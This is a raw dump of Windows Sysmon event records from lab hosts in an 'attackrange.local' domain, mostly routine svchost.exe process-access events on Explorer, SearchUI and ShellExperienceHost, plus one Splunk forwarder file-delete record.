08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054508Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000810260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:07:22.365{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C690666B89A7BCA85A6142B11D11072,SHA256=F1000939755D60A07B2AD0CACACBD3345F63BD9D0177CC690C970256786F234D,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001054502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054496Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054495Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054494Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054493Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054492Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054491Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054490Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054489Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054488Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054487Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:07:22.700{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
